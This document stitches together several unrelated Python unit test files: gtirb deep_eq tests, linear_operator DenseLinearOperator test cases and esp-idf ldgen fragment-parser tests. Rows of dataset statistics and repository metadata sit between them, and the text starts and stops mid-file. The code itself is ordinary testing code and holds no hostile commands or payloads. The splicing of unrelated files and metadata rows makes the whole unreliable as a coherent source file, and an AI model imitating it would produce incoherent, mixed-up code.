symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name3", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name3", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
s1 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
attributes={gtirb.SymbolicExpression.Attribute.Part1},
)
s2 = gtirb.SymAddrAddr(
offset=1,
scale=2,
symbol1=gtirb.Symbol(name="name1", payload=None, uuid=id1),
symbol2=gtirb.Symbol(name="name2", payload=None, uuid=id2),
)
self.assertFalse(s1.deep_eq(s2))
def test_byte_intervals(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
id6 = uuid.uuid4()
b1 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=None,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"1234",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=8,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=0,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=5, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
6, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
)
},
uuid=id1,
)
self.assertTrue(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
7: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id1,
)
self.assertFalse(b1.deep_eq(b2))
b2 = gtirb.ByteInterval(
address=1,
contents=b"abcd",
size=4,
initialized_size=4,
blocks=(
gtirb.DataBlock(size=1, offset=3, uuid=id2),
gtirb.CodeBlock(size=1, decode_mode=2, offset=3, uuid=id3),
),
symbolic_expressions={
2: gtirb.SymAddrConst(
3, gtirb.Symbol(name="name1", payload=4, uuid=id4)
),
},
uuid=id6,
)
self.assertFalse(b1.deep_eq(b2))
def test_sections(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
id3 = uuid.uuid4()
id4 = uuid.uuid4()
s1 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertTrue(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name2",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"12345", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(gtirb.ByteInterval(contents=b"abcd", uuid=id2),),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Writable,),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(
gtirb.Section.Flag.Readable,
gtirb.Section.Flag.Writable,
gtirb.Section.Flag.Loaded,
),
uuid=id1,
)
self.assertFalse(s1.deep_eq(s2))
s2 = gtirb.Section(
name="name",
byte_intervals=(
gtirb.ByteInterval(contents=b"abcd", uuid=id2),
gtirb.ByteInterval(contents=b"1234", uuid=id3),
),
flags=(gtirb.Section.Flag.Readable, gtirb.Section.Flag.Writable),
uuid=id4,
)
self.assertFalse(s1.deep_eq(s2))
def test_cfg(self):
id1 = uuid.uuid4()
id2 = uuid.uuid4()
e1 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(
e1.deep_eq(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
)
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertTrue(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=3, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=3, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Fallthrough,
conditional=True,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=False,
direct=False,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
e2 = gtirb.CFG(
[
gtirb.Edge(
gtirb.CodeBlock(size=1, uuid=id1),
gtirb.CodeBlock(size=2, uuid=id2),
gtirb.Edge.Label(
type=gtirb.Edge.Type.Branch,
conditional=True,
direct=True,
),
)
]
)
self.assertFalse(e1.deep_eq(e2))
def test_module(self):
    """gtirb.Module.deep_eq: identical modules compare equal; aux_data
    differences are ignored; any other field difference compares unequal.

    The original repeated the full 20-line Module constructor sixteen
    times; it is deduplicated into the make_module helper (behavior
    unchanged — every original variant is reproduced below).
    """
    id1, id2, id3, id4, id5, id6, id7, id8 = (uuid.uuid4() for _ in range(8))

    def make_module(**overrides):
        # Build a Module from the shared baseline, with selected keyword
        # arguments replaced by *overrides*.
        kwargs = dict(
            aux_data={"key": gtirb.AuxData("value", "string")},
            binary_path="binary_path",
            file_format=gtirb.Module.FileFormat.ELF,
            isa=gtirb.Module.ISA.X64,
            name="name",
            preferred_addr=1,
            rebase_delta=2,
            entry_point=gtirb.CodeBlock(size=1, uuid=id2),
            proxies=(gtirb.ProxyBlock(uuid=id3), gtirb.ProxyBlock(uuid=id4)),
            symbols=(
                gtirb.Symbol(name="sym1", uuid=id5),
                gtirb.Symbol(name="sym2", uuid=id6),
            ),
            sections=(
                gtirb.Section(name="sect1", uuid=id7),
                gtirb.Section(name="sect2", uuid=id8),
            ),
            uuid=id1,
        )
        kwargs.update(overrides)
        return gtirb.Module(**kwargs)

    m1 = make_module()

    # identical module compares equal
    self.assertTrue(m1.deep_eq(make_module()))
    # aux_data contents are not considered by deep_eq (assertTrue in the
    # original as well)
    self.assertTrue(
        m1.deep_eq(make_module(aux_data={"key": gtirb.AuxData("other_value", "string")}))
    )

    # each of these single-field differences compares unequal
    unequal_overrides = [
        dict(binary_path="other_binary_path"),
        dict(file_format=gtirb.Module.FileFormat.PE),
        dict(isa=gtirb.Module.ISA.ARM),
        dict(name="other_name"),
        dict(preferred_addr=5),
        dict(rebase_delta=5),
        dict(entry_point=gtirb.CodeBlock(size=2, uuid=id2)),
        dict(proxies=(gtirb.ProxyBlock(uuid=id4), gtirb.ProxyBlock(uuid=id4))),
        dict(proxies=(gtirb.ProxyBlock(uuid=id4),)),
        dict(symbols=(
            gtirb.Symbol(name="sym11", uuid=id5),
            gtirb.Symbol(name="sym2", uuid=id6),
        )),
        dict(symbols=(gtirb.Symbol(name="sym1", uuid=id5),)),
        dict(sections=(
            gtirb.Section(name="sect1", uuid=id7),
            gtirb.Section(name="sect22", uuid=id8),
        )),
        dict(sections=(gtirb.Section(name="sect2", uuid=id8),)),
        dict(uuid=id2),
    ]
    for overrides in unequal_overrides:
        self.assertFalse(m1.deep_eq(make_module(**overrides)))
def test_ir(self):
    """gtirb.IR.deep_eq: identical IRs compare equal; aux_data differences
    are ignored; module, CFG, version, or uuid differences compare unequal.

    The original repeated the full IR constructor eight times; it is
    deduplicated into the make_ir helper (behavior unchanged).
    """
    id1, id2, id3, id4, id5, id6, id7, id8 = (uuid.uuid4() for _ in range(8))

    def make_ir(**overrides):
        # Build an IR from the shared baseline, with selected keyword
        # arguments replaced by *overrides*.
        kwargs = dict(
            modules=(
                gtirb.Module(name="m1", uuid=id2),
                gtirb.Module(name="m2", uuid=id3),
            ),
            aux_data={"key": gtirb.AuxData("value", "string")},
            cfg=(
                gtirb.Edge(
                    gtirb.CodeBlock(size=1, uuid=id4),
                    gtirb.CodeBlock(size=2, uuid=id5),
                ),
                gtirb.Edge(
                    gtirb.CodeBlock(size=3, uuid=id6),
                    gtirb.CodeBlock(size=4, uuid=id7),
                ),
            ),
            version=1,
            uuid=id1,
        )
        kwargs.update(overrides)
        return gtirb.IR(**kwargs)

    ir1 = make_ir()

    # identical IR compares equal
    self.assertTrue(ir1.deep_eq(make_ir()))
    # aux_data contents are not considered by deep_eq (assertTrue in the
    # original as well)
    self.assertTrue(
        ir1.deep_eq(make_ir(aux_data={"key": gtirb.AuxData("other_value", "string")}))
    )

    # differing module name
    self.assertFalse(ir1.deep_eq(make_ir(modules=(
        gtirb.Module(name="m11", uuid=id2),
        gtirb.Module(name="m2", uuid=id3),
    ))))
    # missing module
    self.assertFalse(ir1.deep_eq(make_ir(modules=(gtirb.Module(name="m1", uuid=id2),))))
    # differing CFG block size
    self.assertFalse(ir1.deep_eq(make_ir(cfg=(
        gtirb.Edge(
            gtirb.CodeBlock(size=55, uuid=id4),
            gtirb.CodeBlock(size=2, uuid=id5),
        ),
        gtirb.Edge(
            gtirb.CodeBlock(size=3, uuid=id6),
            gtirb.CodeBlock(size=4, uuid=id7),
        ),
    ))))
    # missing CFG edge
    self.assertFalse(ir1.deep_eq(make_ir(cfg=(
        gtirb.Edge(
            gtirb.CodeBlock(size=3, uuid=id6),
            gtirb.CodeBlock(size=4, uuid=id7),
        ),
    ))))
    # differing version
    self.assertFalse(ir1.deep_eq(make_ir(version=5)))
    # differing uuid
    self.assertFalse(ir1.deep_eq(make_ir(uuid=id8)))
# Allow running this test file directly as a script, in addition to via a
# test runner.
if __name__ == "__main__":
    unittest.main()
| 33.41371 | 79 | 0.478121 | 4,230 | 41,433 | 4.615603 | 0.032861 | 0.035136 | 0.069914 | 0.048658 | 0.980742 | 0.980025 | 0.97603 | 0.971215 | 0.960049 | 0.956976 | 0 | 0.047851 | 0.390703 | 41,433 | 1,239 | 80 | 33.440678 | 0.72553 | 0.000579 | 0 | 0.816754 | 0 | 0 | 0.033787 | 0 | 0 | 0 | 0 | 0 | 0.06719 | 1 | 0.008726 | false | 0 | 0.002618 | 0 | 0.012216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
168a44bb51a6ff0befdbd2800ba0f28315b5e004 | 1,848 | py | Python | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | 2 | 2021-09-03T22:49:17.000Z | 2022-03-01T21:14:34.000Z | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | 1 | 2021-09-23T14:45:30.000Z | 2021-09-23T14:45:30.000Z | test/operators/test_dense_linear_operator.py | gpleiss/linear_operator | a80f82ff6cdd10c493fa8344a146cf539ec7a092 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from __future__ import annotations
import unittest
import torch
from linear_operator.operators import DenseLinearOperator
from linear_operator.test.linear_operator_test_case import LinearOperatorTestCase, SymmetricLinearOperatorTestCase
class TestDenseLinearOperator(LinearOperatorTestCase, unittest.TestCase):
    """DenseLinearOperator over a single (unbatched) 5x6 random matrix;
    the actual test methods come from LinearOperatorTestCase."""

    seed = 0

    def create_linear_operator(self):
        torch.manual_seed(0)
        matrix = torch.randn(5, 6).requires_grad_(True)
        return DenseLinearOperator(matrix)

    def evaluate_linear_operator(self, linear_operator):
        # The dense representation is simply the wrapped tensor.
        return linear_operator.tensor
class TestDenseLinearOperatorMultiBatch(LinearOperatorTestCase, unittest.TestCase):
    """DenseLinearOperator over a (2, 3)-batched 5x6 random matrix;
    the actual test methods come from LinearOperatorTestCase."""

    seed = 0

    def create_linear_operator(self):
        torch.manual_seed(0)
        matrix = torch.randn(2, 3, 5, 6).requires_grad_(True)
        return DenseLinearOperator(matrix)

    def evaluate_linear_operator(self, linear_operator):
        # The dense representation is simply the wrapped tensor.
        return linear_operator.tensor
class TestSymmetricDenseLinearOperator(SymmetricLinearOperatorTestCase, unittest.TestCase):
    """DenseLinearOperator over a symmetric 5x5 matrix (A @ A^T of a random
    5x6 matrix); test methods come from SymmetricLinearOperatorTestCase."""

    seed = 0

    def create_linear_operator(self):
        torch.manual_seed(0)
        base = torch.randn(5, 6)
        symmetric = base @ base.transpose(-1, -2)
        symmetric.requires_grad_(True)
        return DenseLinearOperator(symmetric)

    def evaluate_linear_operator(self, linear_operator):
        # The dense representation is simply the wrapped tensor.
        return linear_operator.tensor
class TestSymmetricDenseLinearOperatorMultiBatch(SymmetricLinearOperatorTestCase, unittest.TestCase):
    """DenseLinearOperator over a (2, 3)-batched symmetric 5x5 matrix
    (A @ A^T per batch); test methods come from SymmetricLinearOperatorTestCase."""

    seed = 0

    def create_linear_operator(self):
        torch.manual_seed(0)
        base = torch.randn(2, 3, 5, 6)
        symmetric = base @ base.transpose(-1, -2)
        symmetric.requires_grad_(True)
        return DenseLinearOperator(symmetric)

    def evaluate_linear_operator(self, linear_operator):
        # The dense representation is simply the wrapped tensor.
        return linear_operator.tensor
| 28.430769 | 114 | 0.729437 | 201 | 1,848 | 6.482587 | 0.218905 | 0.204144 | 0.110514 | 0.064467 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0.725249 | 0 | 0.016835 | 0.196429 | 1,848 | 64 | 115 | 28.875 | 0.860606 | 0.011364 | 0 | 0.790698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.186047 | false | 0 | 0.116279 | 0.093023 | 0.674419 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
169af566a2b0589304b366b919da497d2992c7e2 | 27,058 | py | Python | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | tools/ldgen/test/test_fragments.py | smartsnow/esp-idf | 6e776946d01ec0d081d09000c36d23ec1d318c06 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Copyright 2018-2019 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import tempfile
import unittest
from io import StringIO
from pyparsing import ParseException, ParseFatalException, Word, alphanums
try:
from fragments import FRAGMENT_TYPES, Fragment, FragmentFile, KeyGrammar
from sdkconfig import SDKConfig
except ImportError:
sys.path.append('../')
from fragments import FRAGMENT_TYPES, Fragment, FragmentFile, KeyGrammar
from sdkconfig import SDKConfig
class SampleFragment(Fragment):
    """Minimal Fragment subclass for exercising the generic fragment parser.

    Per the KeyGrammar definitions and the tests below: key_1 is required,
    key_2 is optional, and key_3 must carry between 3 and 5 values.
    """

    grammars = {
        'key_1': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 0, None, True),
        'key_2': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 0, None, False),
        'key_3': KeyGrammar(Word(alphanums + '_').setResultsName('value'), 3, 5, False)
    }

    def set_key_value(self, key, parse_results):
        # Store the parsed 'value' tokens for key_1/key_2; key_3 results are
        # parsed (and validated) but intentionally not stored.
        if key in ('key_1', 'key_2'):
            setattr(self, key, [entry['value'] for entry in parse_results])

    def get_key_grammars(self):
        return self.__class__.grammars
# Register the sample fragment under the 'test' type so that '[test:<name>]'
# headers in the fixture strings below are parsed as SampleFragment instances.
FRAGMENT_TYPES['test'] = SampleFragment
class FragmentTest(unittest.TestCase):
    """Tests of the generic fragment grammar using SampleFragment; also
    provides the setUp/create_fragment_file helpers reused by the
    fragment-type-specific subclasses below."""
def setUp(self):
    """Point the COMPONENT_KCONFIGS* environment variables at empty
    temporary files, then load the SDKConfig used by every test.

    The files are created with delete=False and removed in tearDown().
    """
    with tempfile.NamedTemporaryFile(delete=False) as f:
        # NamedTemporaryFile.name is already an absolute path, so the
        # original os.path.join(tempfile.gettempdir(), f.name) was a no-op
        # and has been dropped.
        self.kconfigs_source_file = f.name

    with tempfile.NamedTemporaryFile(delete=False) as f:
        self.kconfig_projbuilds_source_file = f.name

    os.environ['COMPONENT_KCONFIGS_SOURCE_FILE'] = self.kconfigs_source_file
    os.environ['COMPONENT_KCONFIGS_PROJBUILD_SOURCE_FILE'] = self.kconfig_projbuilds_source_file
    os.environ['COMPONENT_KCONFIGS'] = ''
    os.environ['COMPONENT_KCONFIGS_PROJBUILD'] = ''

    # prepare_kconfig_files.py doesn't have to be called because COMPONENT_KCONFIGS
    # and COMPONENT_KCONFIGS_PROJBUILD are empty
    self.sdkconfig = SDKConfig('data/Kconfig', 'data/sdkconfig')
def tearDown(self):
    # Best-effort cleanup of the files created in setUp(); errors (e.g. a
    # file that was already removed) are deliberately ignored so cleanup
    # can never mask a test failure.
    try:
        os.remove(self.kconfigs_source_file)
        os.remove(self.kconfig_projbuilds_source_file)
    except Exception:
        pass
@staticmethod
def create_fragment_file(contents, name='test_fragment.lf'):
f = StringIO(contents)
f.name = name
return f
def test_basic(self):
    """Values and '#' comments parse into per-key lists."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_1
    value_2 # comments should be ignored
    value_3
# this is a comment as well
key_2: value_a
# this is the last comment
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)

    self.assertEqual(len(fragment_file.fragments[0].key_1), 3)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
    self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')
    self.assertEqual(len(fragment_file.fragments[0].key_2), 1)
    self.assertEqual(fragment_file.fragments[0].key_2[0], 'value_a')
def test_duplicate_keys(self):
    """Repeating a key within one fragment is a fatal parse error."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1: value_1
key_1: value_a
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_empty_key(self):
    """A key with no values at all fails to parse."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
""")
    with self.assertRaises(ParseException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_conditional(self):
    """if/elif/else conditions select values based on the test sdkconfig.

    The expected results imply A=y, B=n, C=y in data/sdkconfig — TODO
    confirm against the data file.
    """
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_1
    if A = y:
        value_2
        value_3
    if A = n:
        value_4
    if B = n:
        value_5
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
    self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')
    self.assertEqual(fragment_file.fragments[0].key_1[3], 'value_5')

    # elif chain: only the first true branch contributes values
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_1
    if B = y:
        value_2
    elif C = y:
        value_3
    elif A = y:
        value_4
    else:
        value_5
    value_6
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_3')
    self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_6')

    # nested conditionals, plus a '!=' condition on a second key
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_1
    if A = y:
        value_2
        if B = y:
            value_3
        else:
            value_4
        if C = y:
            value_5
        value_6
    value_7
key_2:
    value_a
    if B != y:
        value_b
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
    self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_4')
    self.assertEqual(fragment_file.fragments[0].key_1[3], 'value_5')
    self.assertEqual(fragment_file.fragments[0].key_1[4], 'value_6')
    self.assertEqual(fragment_file.fragments[0].key_1[5], 'value_7')
    self.assertEqual(fragment_file.fragments[0].key_2[0], 'value_a')
    self.assertEqual(fragment_file.fragments[0].key_2[1], 'value_b')

    # a required key whose only (false) condition yields no values still parses
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    if A = n:
        value_2
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(len(fragment_file.fragments[0].key_1), 0)
def test_empty_file(self):
    """A fragment file with no content yields no fragments."""
    test_fragment = self.create_fragment_file(u"""
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(len(fragment_file.fragments), 0)
def test_setting_indent(self):
    """The indentation of a key's first value dictates the indent that all
    of its remaining values must use."""
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
 value_1
 value_2
 value_3
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)

    self.assertEqual(len(fragment_file.fragments[0].key_1), 3)
    self.assertEqual(fragment_file.fragments[0].key_1[0], 'value_1')
    self.assertEqual(fragment_file.fragments[0].key_1[1], 'value_2')
    self.assertEqual(fragment_file.fragments[0].key_1[2], 'value_3')

    # a value at a different indent than the first one is a fatal error
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
 value_1
   value_2 # first element dictates indent
 value_3
""")
    with self.assertRaises(ParseFatalException):
        FragmentFile(test_fragment, self.sdkconfig)
def test_values_num_limit(self):
    """key_3's grammar accepts no fewer than 3 and no more than 5 values."""
    # exactly the minimum (3 values) parses
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_3:
    value_1
    value_2
    value_3
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    # Fix: this first parse result was previously discarded without any
    # assertion, unlike every other sub-case in this test.
    self.assertEqual(len(fragment_file.fragments), 1)

    # 4 values (within the limit) parses
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_3:
    value_1
    value_2
    value_3
    value_4
""")
    fragment_file = FragmentFile(test_fragment, self.sdkconfig)
    self.assertEqual(len(fragment_file.fragments), 1)

    # exactly the maximum (5 values) parses
    test_fragment = self.create_fragment_file(u"""
[test:test]
key_1:
    value_a
key_3:
    value_1
    value_2
    value_3
    value_4
    value_5
""")
